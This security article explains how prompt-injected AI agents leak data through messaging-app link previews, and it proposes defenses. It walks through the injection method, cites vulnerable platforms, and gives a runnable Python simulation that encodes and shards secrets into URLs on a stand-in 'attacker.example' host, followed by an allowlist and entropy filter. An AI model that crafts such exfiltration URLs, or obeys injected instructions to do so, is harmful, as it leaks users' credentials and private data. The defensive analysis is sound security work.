
Link previews in messaging apps silently exfiltrate data from AI agents, and the attack requires zero user interaction. An attacker embeds a hidden prompt injection in content an AI agent processes. The agent generates a URL with sensitive data encoded in it. The messaging app’s link preview feature fetches that URL automatically, sending the data to the attacker’s server. No click needed. No warning shown. PromptArmor documented this attack across six major messaging platforms in February 2026, and The Register broke the story to a wider audience.

The vulnerability is not in any single AI model or messaging app. It exists at the intersection of three common design choices: giving LLMs access to external data, allowing automatic URL preview functionality, and having insufficient output filtering. Fix any one of those three, and the attack chain breaks. But right now, most enterprise AI agent deployments have all three.

Related: The Web Security Model Is Broken for AI Agents

The Three-Step Attack Chain: Injection, URL Crafting, Preview Fetch

The link preview exfiltration attack is elegant in its simplicity. It chains together three components that are each individually benign.

Step 1: Indirect prompt injection

The attacker places hidden instructions in content the AI agent will process. This could be invisible text on a web page the agent browses, hidden instructions in a document the agent summarizes, or metadata in an image the agent analyzes. The injected prompt tells the agent to encode specific sensitive data (API keys, conversation contents, file data) into a URL pointing to the attacker’s domain.

Trend Micro’s “Pandora” proof-of-concept demonstrated this with Microsoft Word documents containing hidden instructions. The instructions told the agent to collect the user’s memory context and embed it into an external URL. The document looked perfectly normal to human readers.

Step 2: The agent crafts the exfiltration URL

The compromised agent generates a response containing a URL like https://attacker.com/preview?data=BASE64_ENCODED_SECRETS. The URL is typically disguised as a helpful reference link, a documentation pointer, or a relevant resource. The agent’s response looks completely legitimate to the user. There is no visible sign that anything is wrong.

A February 2026 research paper called “Silent Egress” introduced a technique called sharded exfiltration: instead of cramming all stolen data into one URL, the attack splits it across multiple requests. Each individual URL looks innocuous, but together they reconstruct the full payload on the attacker’s server.

Step 3: The messaging platform fetches the preview

Here is where the attack completes without any user action. The messaging app sees a URL in the agent’s response and automatically fetches it to generate a rich preview (title, description, thumbnail). That HTTP GET request hits the attacker’s server with the encoded data riding along in the URL’s path or query string. The fetch is made by the platform’s preview service or the client on the user’s behalf, not by the user, so no click, consent prompt, or browser-side protection stands between the agent’s output and the attacker’s server.

The user sees a normal message with a normal-looking link preview. The exfiltration already happened.
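The three steps above, run end to end as a simulation. This is an added example, not PromptArmor’s or the Silent Egress authors’ code: the secret string, the domain attacker.example and the ref parameter are constructed for illustration, and the preview fetch is modelled as a list of GET requests rather than real network traffic. It also shows the sharded variant from Step 2, where the encoded blob is split across several URLs and reassembled on the attacker side from a shard index carried in the path.

```python
import base64
import re
from urllib.parse import parse_qs, urlparse

# Constructed sample data: the sensitive context an agent might hold in memory.
SECRET_CONTEXT = "api_key=sk-live-EXAMPLE-0123456789; customer=ACME; invoice_total=48200"

# Assumption: an attacker-controlled domain (hypothetical name).
ATTACKER_HOST = "attacker.example"

# What a preview generator does first: find every URL in the message text.
URL_RE = re.compile(r"https?://[^\s<>\"']+")


def craft_exfil_urls(secret: str, shard_size: int = 0) -> list:
    """Step 2, the injected instruction carried out: encode the secret into one
    URL on the attacker's domain, or, with shard_size > 0, split the encoded
    blob across several URLs (sharded exfiltration). Base64 padding is
    stripped so the blob is URL-clean; the receiver restores it."""
    blob = base64.urlsafe_b64encode(secret.encode()).decode().rstrip("=")
    if shard_size <= 0:
        return [f"https://{ATTACKER_HOST}/docs?ref={blob}"]
    shards = [blob[i:i + shard_size] for i in range(0, len(blob), shard_size)]
    # The shard index travels in the path so the server can reorder fragments
    # no matter which preview fetch arrives first.
    return [f"https://{ATTACKER_HOST}/docs/{i}?ref={s}" for i, s in enumerate(shards)]


def agent_reply(urls: list) -> str:
    """The text the user actually sees: a plausible answer with 'reference' links."""
    refs = "\n".join(f"- {u}" for u in urls)
    return f"Here is the summary you asked for.\n\nUseful references:\n{refs}\n"


def unfurl(message: str) -> list:
    """Step 3, modelled: the platform's preview generator issues an HTTP GET for
    every URL in the message without asking the user. The GET is represented
    as a (method, url) tuple so the example runs offline."""
    return [("GET", url) for url in URL_RE.findall(message)]


def attacker_server(requests: list) -> str:
    """Attacker side: record the 'ref' value of each preview fetch, order the
    fragments by the index in the path, and decode the reassembled blob."""
    fragments = {}
    for method, url in requests:
        parsed = urlparse(url)
        if method != "GET" or parsed.hostname != ATTACKER_HOST:
            continue
        ref = parse_qs(parsed.query).get("ref", [""])[0]
        last = parsed.path.rsplit("/", 1)[-1]
        fragments[int(last) if last.isdigit() else 0] = ref
    blob = "".join(fragments[i] for i in sorted(fragments))
    blob += "=" * (-len(blob) % 4)  # restore the stripped base64 padding
    return base64.urlsafe_b64decode(blob).decode()


if __name__ == "__main__":
    for shard in (0, 16):
        message = agent_reply(craft_exfil_urls(SECRET_CONTEXT, shard))
        fetched = unfurl(message)
        print(f"{len(fetched)} preview fetch(es); attacker recovered:",
              attacker_server(fetched))
```

Nothing in `agent_reply` is hostile on its face: the only artefact of the attack is a query parameter that a safety filter sees as an opaque token, which is exactly why the detection numbers in the next section come out the way they do.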

89% Success Rate, 95% Undetected: The Silent Egress Numbers

The “Silent Egress” paper by Qianlong Lan, Anuj Kaul, Shaun Jones, and Stephanie Westrum put concrete numbers on this attack. Using a qwen2.5:7b-based agent, they achieved an 89% attack success rate across their experiments. More concerning: 95% of successful attacks were not detected by output-based safety checks.

Those numbers are not theoretical. The researchers built a functional attack pipeline and measured it. The reason detection fails is structural: the agent’s final response to the user looks completely harmless. The sensitive data is encoded in the URL, which the safety filters see as just another web link. Unless the filter specifically checks whether URL parameters contain encoded versions of data the agent has access to (a check that standard output filters do not perform), the exfiltration passes unnoticed.

The sharded exfiltration variant makes detection even harder. When sensitive information is split across multiple seemingly unrelated URLs, pattern matching on individual outputs catches nothing. You would need to correlate multiple agent responses over time and reconstruct the fragments to detect the leak, a correlation that per-message output filters do not attempt.

Related: AI Agent Prompt Injection: The Attack That Breaks Every Guardrail

Which Platforms Are Vulnerable (And Which Are Not)

PromptArmor tested AI agents across multiple messaging platforms. The results show that vulnerability depends on both the messaging app’s preview behavior and the agent’s output filtering.

Confirmed vulnerable combinations:

  • Microsoft Teams + Copilot Studio: Highest risk. Teams generates the most preview fetches, and Copilot Studio has deep access to Microsoft 365 data (Outlook, OneDrive, SharePoint, Teams chat history). The exfiltration surface is enormous.
  • Discord + OpenClaw: Vulnerable with default settings.
  • Slack + Cursor Slackbot: Vulnerable.
  • Snapchat + SnapAI: Vulnerable.
  • Telegram + OpenClaw: Vulnerable, and exposed by default.

Safer configurations:

  • Claude’s Slack app showed resistance to the attack in PromptArmor’s testing.
  • WhatsApp-based agent deployments showed reduced vulnerability.
  • Signal-based deployments in containerized environments also resisted the attack.

The Microsoft Teams + Copilot combination is the most concerning for enterprises. Aim Security researchers independently discovered a related vulnerability they named EchoLeak (CVE-2025-32711, CVSS 9.3), which allowed attackers to extract sensitive information from Microsoft 365 services via Copilot by exploiting a specific Teams URL format. Microsoft patched EchoLeak, but the underlying architecture that makes these attacks possible remains.

A separate vulnerability, CVE-2026-26133, demonstrated cross-prompt injection in Microsoft 365 Copilot’s email summarization. Injected prompts could steer Copilot to pull internal Teams messages and embed them into attacker-supplied links inside email summaries.

The OWASP Framework: Least Agency as a Defense Principle

The OWASP Top 10 for Agentic Applications 2026, developed with contributions from over 100 security experts, directly addresses this attack class. Link preview exfiltration sits at the intersection of three OWASP categories: Prompt Injection, Tool Misuse, and Excessive Agency.

OWASP’s core principle for agentic security is least agency: agents should only have the minimum level of autonomy required for their defined task. This goes beyond least privilege (limiting what an agent can access) to limiting what an agent can do autonomously. An agent that can generate arbitrary URLs has more agency than it needs for most tasks.

The Securing Agentic Applications Guide 1.0 recommends specific controls relevant to link preview attacks:

  • Output filtering: Scan agent outputs for URLs containing encoded data before delivering them to the user or messaging platform.
  • URL allowlisting: Only permit the agent to generate links to known, trusted domains.
  • Human approval for elevated actions: Require explicit user confirmation before the agent generates external links.

OpenAI’s approach adds another layer: verify URLs against a public web index before auto-fetching. If a URL is already known to exist publicly and independently of the user’s conversation, it is treated as safe to preview. If it cannot be verified, the user sees a warning. This does not eliminate the attack, but it forces the attacker to use real, publicly indexed URLs, which significantly increases the cost and traceability of the attack.

Related: OWASP Top 10 for Agentic Applications: Every Risk Explained with Real Attacks

Practical Defenses: What to Do Before Monday

If you deploy AI agents in messaging platforms:

  1. Disable link previews for AI-generated content. This is the single most effective mitigation. In OpenClaw, set linkPreview: false in your channel configuration. For custom agents, strip URLs from agent outputs before they reach the messaging layer, or mark them as no-preview.

  2. Implement URL allowlisting. Your agent should only generate links to domains you control or explicitly trust. Any URL pointing to an unknown domain in an agent’s output should be flagged and blocked.

  3. Audit Microsoft 365 Copilot integrations. If your organization uses Teams with Copilot Studio, review what data sources Copilot can access. Apply the principle of least agency: does Copilot really need access to SharePoint, OneDrive, Outlook, and Teams history simultaneously?

  4. Deploy output monitoring. Implement real-time monitoring that looks for unusual URL patterns in agent outputs, specifically URLs with long query parameters, Base64-encoded segments, or parameters that could contain fragments of sensitive data.

  5. Adopt OWASP’s agentic security framework. The OWASP Agentic AI Threats and Mitigations guide provides a structured approach. Start with a threat model that maps every data source your agents can access, every output channel they can write to, and every intermediate step where data could leak.
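An output filter of the kind the Silent Egress detection numbers argue for and that items 2 and 4 above call for, as an added example (not OpenClaw’s, OWASP’s or any vendor’s code). The allowlisted hosts, the entropy threshold and the character budget are assumptions chosen for illustration, and the sample messages are constructed. The filter neutralizes links to hosts outside the allowlist and links on allowed hosts whose query or path carries a base64-shaped, high-entropy segment; the correlator addresses the sharded case from the detection section by summing query-string characters per session and destination host across messages, for deployments that only monitor and cannot block.

```python
import math
import re
from collections import defaultdict
from urllib.parse import urlparse

# Assumption: the only domains this agent is allowed to link to (hypothetical).
ALLOWED_HOSTS = {"docs.example.com", "intranet.example.com"}

URL_RE = re.compile(r"https?://[^\s<>\"'()]+")
# The usual shape of an encoded payload: a long run of base64 / URL-safe-base64 characters.
B64ISH_RE = re.compile(r"^[A-Za-z0-9+/_-]{16,}={0,2}$")
ENTROPY_THRESHOLD = 3.5  # bits per character; English slugs sit well below this


def shannon_entropy(s: str) -> float:
    if not s:
        return 0.0
    n = len(s)
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def host_allowed(host: str) -> bool:
    """Exact match or subdomain of an allowlisted host (docs.example.com.evil.test does not pass)."""
    return host in ALLOWED_HOSTS or any(host.endswith("." + h) for h in ALLOWED_HOSTS)


def query_values(query: str) -> list:
    """Raw query values, split without decoding so '+' in standard base64 survives."""
    return [p.split("=", 1)[1] if "=" in p else p for p in query.split("&") if p]


def encoded_segments(url: str) -> list:
    """Query values and path segments that look like encoded data."""
    parsed = urlparse(url)
    candidates = query_values(parsed.query) + parsed.path.split("/")
    return [c for c in candidates
            if B64ISH_RE.match(c) and shannon_entropy(c) > ENTROPY_THRESHOLD]


def filter_agent_output(message: str):
    """Run before the agent's text reaches the messaging layer. Returns
    (sanitized_message, findings). A link is replaced by plain text, so the
    platform has nothing to unfurl, when its host is not allowlisted or when
    its URL carries an encoded-looking segment even on an allowed host."""
    findings = []

    def decide(match):
        url = match.group(0)
        host = (urlparse(url).hostname or "").lower()
        if not host_allowed(host):
            reason = "host-not-allowlisted"
        elif encoded_segments(url):
            reason = "encoded-payload-in-url"
        else:
            return url
        findings.append({"url": url, "host": host, "reason": reason})
        return f"[link removed: {host}]"

    return URL_RE.sub(decide, message), findings


class ShardCorrelator:
    """For monitor-only deployments: sum the query-string characters sent to
    each non-allowlisted host per session, across messages, so fragments too
    short to trip the per-URL check still raise an alert once their total
    exceeds a budget."""

    def __init__(self, budget_chars: int = 48):
        self.budget = budget_chars
        self.chars = defaultdict(int)
        self.links = defaultdict(int)

    def observe(self, session: str, message: str) -> list:
        alerts = []
        for url in URL_RE.findall(message):
            parsed = urlparse(url)
            host = (parsed.hostname or "").lower()
            if host_allowed(host):
                continue
            key = (session, host)
            self.chars[key] += sum(len(v) for v in query_values(parsed.query))
            self.links[key] += 1
            if self.chars[key] >= self.budget:
                alerts.append(f"{session}: {self.chars[key]} query chars to {host} "
                              f"over {self.links[key]} links")
        return alerts


if __name__ == "__main__":
    # Constructed sample: a benign reference and a disguised exfiltration link.
    sample = ("See https://docs.example.com/guides/getting-started and "
              "https://attacker.example/docs?ref=c2VjcmV0PWFiYzEyMztpZD00Mg")
    print(filter_agent_output(sample))
```

The allowlist does the real work; the entropy check is a backstop for allowed hosts and will also flag legitimate opaque tokens (signed download links, tracking parameters), so tune the threshold against your own agent’s normal output before blocking on it. The correlator needs a stable session or user identifier from the agent platform, and its budget should be set below the smallest secret you care about losing.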

The link preview attack is a reminder that AI agent security is not just about what the model does. It is about the entire system: the model, the platform, the messaging app, the preview mechanism, and every automatic behavior that no one thought to question. IBM’s 2026 X-Force Threat Intelligence Index reported a 44% increase in attacks exploiting public-facing applications, partly driven by AI-enabled vulnerability discovery. The attack surface is expanding faster than defenses.

Related: ZombieAgent: The Zero-Click Exploit That Hijacks AI Agents Through Memory Poisoning

Frequently Asked Questions

What is AI agent link preview data exfiltration?

AI agent link preview data exfiltration is an attack where a compromised AI agent embeds sensitive data in a URL, and the messaging app’s automatic link preview feature fetches that URL, silently sending the data to an attacker’s server without any user interaction.

Which messaging platforms are vulnerable to link preview exfiltration?

PromptArmor confirmed vulnerabilities in Microsoft Teams (with Copilot Studio), Discord, Slack, Snapchat, and Telegram when used with AI agents. Microsoft Teams poses the highest risk due to Copilot’s deep access to Microsoft 365 data. Claude’s Slack integration and Signal-based deployments showed more resistance.

How do you defend against link preview data exfiltration?

The most effective defenses are: disable link previews for AI-generated content, implement URL allowlisting so agents can only generate links to trusted domains, audit Microsoft 365 Copilot data access permissions, deploy output monitoring for unusual URL patterns, and adopt OWASP’s agentic security framework with least-agency principles.

What is the Silent Egress attack?

Silent Egress is a research paper demonstrating that AI agents can be manipulated via prompt injection to leak data through URLs with an 89% success rate, while 95% of successful attacks evade output-based safety checks. The paper also introduced “sharded exfiltration,” where stolen data is split across multiple requests to avoid detection.

Does OWASP address link preview exfiltration?

Yes. The OWASP Top 10 for Agentic Applications 2026 covers this attack class under Prompt Injection, Tool Misuse, and Excessive Agency. OWASP recommends the principle of least agency, output filtering, URL allowlisting, and human approval for elevated actions as core defenses.